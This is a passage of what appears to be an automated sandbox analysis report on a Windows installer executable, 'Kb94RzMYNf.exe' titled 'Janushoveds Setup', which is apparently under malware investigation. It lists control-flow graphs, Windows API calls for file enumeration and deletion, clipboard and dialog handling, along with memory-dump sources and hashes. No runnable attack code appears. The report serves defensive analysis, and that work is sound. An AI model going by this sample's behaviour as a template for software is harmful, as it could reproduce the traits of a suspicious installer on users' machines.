                                                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00405660
                                                                                                                                                              • SetClipboardData.USER32(0000000D,00000000), ref: 0040566B
                                                                                                                                                              • CloseClipboard.USER32 ref: 00405671
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                                              • String ID: {
                                                                                                                                                              • API String ID: 590372296-366298937
                                                                                                                                                              • Opcode ID: 37368ef33480fb737561e727008f589c68c636835f40b94f7f78e68fc6a36340
                                                                                                                                                              • Instruction ID: 691c8e7aa241a152ccc1fa1da29986a8db7386483fecbbc97dabe6f77f48909a
                                                                                                                                                              • Opcode Fuzzy Hash: 37368ef33480fb737561e727008f589c68c636835f40b94f7f78e68fc6a36340
                                                                                                                                                              • Instruction Fuzzy Hash: D4B14971800608BFDB119FA0DD89EAE7B79FB48355F00803AFA41BA1A0CB755E51DF68

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 428 406072-40607d 429 406090-4060a6 428->429 430 40607f-40608e 428->430 431 4060ac-4060b9 429->431 432 4062be-4062c4 429->432 430->429 431->432 433 4060bf-4060c6 431->433 434 4062ca-4062d5 432->434 435 4060cb-4060d8 432->435 433->432 437 4062e0-4062e1 434->437 438 4062d7-4062db call 406050 434->438 435->434 436 4060de-4060ea 435->436 440 4060f0-40612c 436->440 441 4062ab 436->441 438->437 442 406132-40613d GetVersion 440->442 443 40624c-406250 440->443 444 4062b9-4062bc 441->444 445 4062ad-4062b7 441->445 446 406157 442->446 447 40613f-406143 442->447 448 406252-406256 443->448 449 406285-406289 443->449 444->432 445->432 450 40615e-406165 446->450 447->446 453 406145-406149 447->453 454 406266-406273 call 406050 448->454 455 406258-406264 call 405f97 448->455 451 406298-4062a9 lstrlenW 449->451 452 40628b-406293 call 406072 449->452 457 406167-406169 450->457 458 40616a-40616c 450->458 451->432 452->451 453->446 461 40614b-40614f 453->461 465 406278-406281 454->465 455->465 457->458 463 4061a8-4061ab 458->463 464 40616e-40618b call 405f1d 458->464 461->446 466 406151-406155 461->466 469 4061bb-4061be 463->469 470 4061ad-4061b9 GetSystemDirectoryW 463->470 471 406190-406194 464->471 465->451 468 406283 465->468 466->450 472 406244-40624a call 4062e4 468->472 474 4061c0-4061ce GetWindowsDirectoryW 469->474 475 406229-40622b 469->475 473 40622d-406231 470->473 476 406233-406237 471->476 477 40619a-4061a3 call 406072 471->477 472->451 473->472 473->476 474->475 475->473 478 4061d0-4061da 475->478 476->472 481 406239-40623f lstrcatW 476->481 477->473 483 4061f4-40620a SHGetSpecialFolderLocation 478->483 484 4061dc-4061df 478->484 481->472 486 406225 483->486 487 40620c-406223 SHGetPathFromIDListW CoTaskMemFree 483->487 484->483 485 4061e1-4061e8 484->485 489 4061f0-4061f2 485->489 486->475 487->473 487->486 489->473 489->483
                                                                                                                                                              APIs
                                                                                                                                                              • GetVersion.KERNEL32(00000000,Completed,?,004051E6,Completed,00000000,00000000,0041C400), ref: 00406135
                                                                                                                                                              • GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 004061B3
                                                                                                                                                              • GetWindowsDirectoryW.KERNEL32(: Completed,00000400), ref: 004061C6
                                                                                                                                                              • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 00406202
                                                                                                                                                              • SHGetPathFromIDListW.SHELL32(?,: Completed), ref: 00406210
                                                                                                                                                              • CoTaskMemFree.OLE32(?), ref: 0040621B
                                                                                                                                                              • lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 0040623F
                                                                                                                                                              • lstrlenW.KERNEL32(: Completed,00000000,Completed,?,004051E6,Completed,00000000,00000000,0041C400), ref: 00406299
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                                                                                              • String ID: : Completed$Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                              • API String ID: 900638850-905382516
                                                                                                                                                              • Opcode ID: 77a03850bddf5695e6b0b32a6855accced49c5eafe9b7dc377c0e735c0fbd350
                                                                                                                                                              • Instruction ID: 6a0e75f8176bdfaa808a817e977aa907b1c5d4b6119349843486ba00336cef2a
                                                                                                                                                              • Opcode Fuzzy Hash: 77a03850bddf5695e6b0b32a6855accced49c5eafe9b7dc377c0e735c0fbd350
                                                                                                                                                              • Instruction Fuzzy Hash: 45611E71A00105ABDF20AF65CC41AEE37A5EF45314F12817FE852BA2D0D73D8AA1CB4D

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 490 405841-405867 call 405b0c 493 405880-405887 490->493 494 405869-40587b DeleteFileW 490->494 496 405889-40588b 493->496 497 40589a-4058aa call 406050 493->497 495 4059fd-405a01 494->495 498 405891-405894 496->498 499 4059ab-4059b0 496->499 503 4058b9-4058ba call 405a50 497->503 504 4058ac-4058b7 lstrcatW 497->504 498->497 498->499 499->495 502 4059b2-4059b5 499->502 505 4059b7-4059bd 502->505 506 4059bf-4059c7 call 406393 502->506 508 4058bf-4058c3 503->508 504->508 505->495 506->495 514 4059c9-4059dd call 405a04 call 4057f9 506->514 511 4058c5-4058cd 508->511 512 4058cf-4058d5 lstrcatW 508->512 511->512 513 4058da-4058f6 lstrlenW FindFirstFileW 511->513 512->513 515 4059a0-4059a4 513->515 516 4058fc-405904 513->516 530 4059f5-4059f8 call 4051af 514->530 531 4059df-4059e2 514->531 515->499 521 4059a6 515->521 518 405924-405938 call 406050 516->518 519 405906-40590e 516->519 532 40593a-405942 518->532 533 40594f-40595a call 4057f9 518->533 522 405910-405918 519->522 523 405983-405993 FindNextFileW 519->523 521->499 522->518 526 40591a-405922 522->526 523->516 529 405999-40599a FindClose 523->529 526->518 526->523 529->515 530->495 531->505 534 4059e4-4059f3 call 4051af call 405ef1 531->534 532->523 535 405944-40594d call 405841 532->535 541 40597b-40597e call 4051af 533->541 542 40595c-40595f 533->542 534->495 535->523 541->523 545 405961-405971 call 4051af call 405ef1 542->545 546 405973-405979 542->546 545->523 546->523
                                                                                                                                                              APIs
                                                                                                                                                              • DeleteFileW.KERNELBASE(?,?,774D3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040586A
                                                                                                                                                              • lstrcatW.KERNEL32(0042F250,\*.*,0042F250,?,?,774D3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058B2
                                                                                                                                                              • lstrcatW.KERNEL32(?,0040A014,?,0042F250,?,?,774D3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058D5
                                                                                                                                                              • lstrlenW.KERNEL32(?,?,0040A014,?,0042F250,?,?,774D3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058DB
                                                                                                                                                              • FindFirstFileW.KERNEL32(0042F250,?,?,?,0040A014,?,0042F250,?,?,774D3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058EB
                                                                                                                                                              • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 0040598B
                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 0040599A
                                                                                                                                                              Strings
                                                                                                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 0040584E
                                                                                                                                                              • "C:\Users\user\Desktop\Kb94RzMYNf.exe", xrefs: 00405841
                                                                                                                                                              • \*.*, xrefs: 004058AC
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                              • String ID: "C:\Users\user\Desktop\Kb94RzMYNf.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                                                                              • API String ID: 2035342205-890868225
                                                                                                                                                              • Opcode ID: 310f22d1e18abc7c3bbe2dee3bc3119d14cc0d79031cc9c47b9afefb4b25f888
                                                                                                                                                              • Instruction ID: caf420165dc21d0a99f0983ed575dd8be70d76c6b9b5ff92ec706b465e099e4b
                                                                                                                                                              • Opcode Fuzzy Hash: 310f22d1e18abc7c3bbe2dee3bc3119d14cc0d79031cc9c47b9afefb4b25f888
                                                                                                                                                              • Instruction Fuzzy Hash: DB41B171800A14EADB21AB65CD49BBF7678EF85764F10423BF801B11D1D77C4A82DE6E
                                                                                                                                                              APIs
                                                                                                                                                              • FindFirstFileW.KERNELBASE(?,00430298,0042FA50,00405B55,0042FA50,0042FA50,00000000,0042FA50,0042FA50, 4Mw,?,C:\Users\user\AppData\Local\Temp\,00405861,?,774D3420,C:\Users\user\AppData\Local\Temp\), ref: 0040639E
                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 004063AA
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Find$CloseFileFirst
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2295610775-0
                                                                                                                                                              • Opcode ID: 395586dc4edb235965e2a282b5d7432a8e50c5a064bd8b1b9b8a05e290e3bc0b
                                                                                                                                                              • Instruction ID: 351587cf9ce3a522800e1c73501a9738d9f8821b35168cd3fdb078f4a7df3edc
                                                                                                                                                              • Opcode Fuzzy Hash: 395586dc4edb235965e2a282b5d7432a8e50c5a064bd8b1b9b8a05e290e3bc0b
                                                                                                                                                              • Instruction Fuzzy Hash: C2D012315081209BC34157787E0C84B7B5C9F1A3317259F36F96AF12E1CB348C2286DC
                                                                                                                                                              APIs
                                                                                                                                                              • FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 0040280A
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FileFindFirst
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1974802433-0
                                                                                                                                                              • Opcode ID: a81ee3202ab0ebdc7edd9b8add70fe35bba4a5d97339da7cd4a9b36177af59e9
                                                                                                                                                              • Instruction ID: 34d4ac1ca0ba7345d9811ef03afe410f99a72e11e7e6ea98f315d3ade0c6d005
                                                                                                                                                              • Opcode Fuzzy Hash: a81ee3202ab0ebdc7edd9b8add70fe35bba4a5d97339da7cd4a9b36177af59e9
                                                                                                                                                              • Instruction Fuzzy Hash: 32F08C71A012149BDB01EBA4DE49AAEB378FF45324F20457BE105F21E1E7B89A409B29

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 184 403c3c-403c4e 185 403c54-403c5a 184->185 186 403d8f-403d9e 184->186 185->186 187 403c60-403c69 185->187 188 403da0-403de8 GetDlgItem * 2 call 404114 SetClassLongW call 40140b 186->188 189 403ded-403e02 186->189 192 403c6b-403c78 SetWindowPos 187->192 193 403c7e-403c81 187->193 188->189 190 403e42-403e47 call 404160 189->190 191 403e04-403e07 189->191 203 403e4c-403e67 190->203 195 403e09-403e14 call 401389 191->195 196 403e3a-403e3c 191->196 192->193 198 403c83-403c95 ShowWindow 193->198 199 403c9b-403ca1 193->199 195->196 217 403e16-403e35 SendMessageW 195->217 196->190 202 4040e1 196->202 198->199 204 403ca3-403cb8 DestroyWindow 199->204 205 403cbd-403cc0 199->205 210 4040e3-4040ea 202->210 208 403e70-403e76 203->208 209 403e69-403e6b call 40140b 203->209 211 4040be-4040c4 204->211 213 403cc2-403cce SetWindowLongW 205->213 214 403cd3-403cd9 205->214 220 403e7c-403e87 208->220 221 40409f-4040b8 DestroyWindow EndDialog 208->221 209->208 211->202 218 4040c6-4040cc 211->218 213->210 215 403d7c-403d8a call 40417b 214->215 216 403cdf-403cf0 GetDlgItem 214->216 215->210 222 403cf2-403d09 SendMessageW IsWindowEnabled 216->222 223 403d0f-403d12 216->223 217->210 218->202 225 4040ce-4040d7 ShowWindow 218->225 220->221 226 403e8d-403eda call 406072 call 404114 * 3 GetDlgItem 220->226 221->211 222->202 222->223 227 403d14-403d15 223->227 228 403d17-403d1a 223->228 225->202 254 403ee4-403f20 ShowWindow KiUserCallbackDispatcher call 404136 EnableWindow 226->254 255 403edc-403ee1 226->255 231 403d45-403d4a call 4040ed 227->231 232 403d28-403d2d 228->232 233 403d1c-403d22 228->233 231->215 236 403d63-403d76 SendMessageW 232->236 238 403d2f-403d35 232->238 233->236 237 403d24-403d26 233->237 236->215 237->231 242 403d37-403d3d call 40140b 238->242 243 403d4c-403d55 call 40140b 238->243 252 403d43 242->252 243->215 251 403d57-403d61 243->251 251->252 252->231 258 403f22-403f23 254->258 259 403f25 254->259 255->254 260 403f27-403f55 GetSystemMenu EnableMenuItem SendMessageW 258->260 259->260 261 403f57-403f68 SendMessageW 260->261 262 403f6a 260->262 263 403f70-403fae call 404149 call 406050 lstrlenW call 406072 SetWindowTextW call 401389 261->263 262->263 263->203 272 403fb4-403fb6 263->272 272->203 273 403fbc-403fc0 272->273 274 403fc2-403fc8 273->274 275 403fdf-403ff3 DestroyWindow 273->275 274->202 276 403fce-403fd4 274->276 275->211 277 403ff9-404026 CreateDialogParamW 275->277 276->203 278 403fda 276->278 277->211 279 40402c-404083 call 404114 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 277->279 278->202 279->202 284 404085-404098 ShowWindow call 404160 279->284 286 40409d 284->286 286->211
                                                                                                                                                              APIs
                                                                                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C78
                                                                                                                                                              • ShowWindow.USER32(?), ref: 00403C95
                                                                                                                                                              • DestroyWindow.USER32 ref: 00403CA9
                                                                                                                                                              • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403CC5
                                                                                                                                                              • GetDlgItem.USER32(?,?), ref: 00403CE6
                                                                                                                                                              • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403CFA
                                                                                                                                                              • IsWindowEnabled.USER32(00000000), ref: 00403D01
                                                                                                                                                              • GetDlgItem.USER32(?,00000001), ref: 00403DAF
                                                                                                                                                              • GetDlgItem.USER32(?,00000002), ref: 00403DB9
                                                                                                                                                              • SetClassLongW.USER32(?,000000F2,?), ref: 00403DD3
                                                                                                                                                              • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403E24
                                                                                                                                                              • GetDlgItem.USER32(?,00000003), ref: 00403ECA
                                                                                                                                                              • ShowWindow.USER32(00000000,?), ref: 00403EEB
                                                                                                                                                              • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403EFD
                                                                                                                                                              • EnableWindow.USER32(?,?), ref: 00403F18
                                                                                                                                                              • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F2E
                                                                                                                                                              • EnableMenuItem.USER32(00000000), ref: 00403F35
                                                                                                                                                              • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403F4D
                                                                                                                                                              • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F60
                                                                                                                                                              • lstrlenW.KERNEL32(0042D248,?,0042D248,Janushoveds Setup), ref: 00403F89
                                                                                                                                                              • SetWindowTextW.USER32(?,0042D248), ref: 00403F9D
                                                                                                                                                              • ShowWindow.USER32(?,0000000A), ref: 004040D1
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                                              • String ID: Janushoveds Setup
                                                                                                                                                              • API String ID: 3282139019-1538351398
                                                                                                                                                              • Opcode ID: 4b72a46082cfccb0225a7e19ce14cf06edf6b5bf773da4775a24074ada9f3e72
                                                                                                                                                              • Instruction ID: 977002fee4e807fcea2a4689fe207fdbad8331f3a024ab3ce592dbd86d7f0908
                                                                                                                                                              • Opcode Fuzzy Hash: 4b72a46082cfccb0225a7e19ce14cf06edf6b5bf773da4775a24074ada9f3e72
                                                                                                                                                              • Instruction Fuzzy Hash: 2EC1D171504204BFDB216F61EE89E2B3A69FB88706F04053EF641B21F0CB799991DB6D

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 287 403899-4038b1 call 40642a 290 4038b3-4038c3 call 405f97 287->290 291 4038c5-4038fc call 405f1d 287->291 299 40391f-403948 call 403b6f call 405b0c 290->299 295 403914-40391a lstrcatW 291->295 296 4038fe-40390f call 405f1d 291->296 295->299 296->295 305 4039da-4039e2 call 405b0c 299->305 306 40394e-403953 299->306 311 4039f0-403a15 LoadImageW 305->311 312 4039e4-4039eb call 406072 305->312 306->305 307 403959-403981 call 405f1d 306->307 307->305 317 403983-403987 307->317 315 403a96-403a9e call 40140b 311->315 316 403a17-403a47 RegisterClassW 311->316 312->311 330 403aa0-403aa3 315->330 331 403aa8-403ab3 call 403b6f 315->331 320 403b65 316->320 321 403a4d-403a91 SystemParametersInfoW CreateWindowExW 316->321 318 403999-4039a5 lstrlenW 317->318 319 403989-403996 call 405a31 317->319 325 4039a7-4039b5 lstrcmpiW 318->325 326 4039cd-4039d5 call 405a04 call 406050 318->326 319->318 324 403b67-403b6e 320->324 321->315 325->326 329 4039b7-4039c1 GetFileAttributesW 325->329 326->305 333 4039c3-4039c5 329->333 334 4039c7-4039c8 call 405a50 329->334 330->324 340 403ab9-403ad3 ShowWindow call 4063ba 331->340 341 403b3c-403b3d call 405282 331->341 333->326 333->334 334->326 348 403ad5-403ada call 4063ba 340->348 349 403adf-403af1 GetClassInfoW 340->349 344 403b42-403b44 341->344 346 403b46-403b4c 344->346 347 403b5e-403b60 call 40140b 344->347 346->330 354 403b52-403b59 call 40140b 346->354 347->320 348->349 352 403af3-403b03 GetClassInfoW RegisterClassW 349->352 353 403b09-403b2c DialogBoxParamW call 40140b 349->353 352->353 357 403b31-403b3a call 4037e9 353->357 354->330 357->324
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 0040642A: GetModuleHandleA.KERNEL32(?,00000020,?,00403309,00000009), ref: 0040643C
                                                                                                                                                                • Part of subcall function 0040642A: GetProcAddress.KERNEL32(00000000,?), ref: 00406457
                                                                                                                                                              • lstrcatW.KERNEL32(1033,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000,00000002,774D3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Kb94RzMYNf.exe",00000000), ref: 0040391A
                                                                                                                                                              • lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\neoimpressionism,1033,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000,00000002,774D3420), ref: 0040399A
                                                                                                                                                              • lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\neoimpressionism,1033,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000), ref: 004039AD
                                                                                                                                                              • GetFileAttributesW.KERNEL32(: Completed), ref: 004039B8
                                                                                                                                                              • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\neoimpressionism), ref: 00403A01
                                                                                                                                                                • Part of subcall function 00405F97: wsprintfW.USER32 ref: 00405FA4
                                                                                                                                                              • RegisterClassW.USER32(00433E80), ref: 00403A3E
                                                                                                                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403A56
                                                                                                                                                              • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403A8B
                                                                                                                                                              • ShowWindow.USER32(00000005,00000000), ref: 00403AC1
                                                                                                                                                              • GetClassInfoW.USER32(00000000,RichEdit20W,00433E80), ref: 00403AED
                                                                                                                                                              • GetClassInfoW.USER32(00000000,RichEdit,00433E80), ref: 00403AFA
                                                                                                                                                              • RegisterClassW.USER32(00433E80), ref: 00403B03
                                                                                                                                                              • DialogBoxParamW.USER32(?,00000000,00403C3C,00000000), ref: 00403B22
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
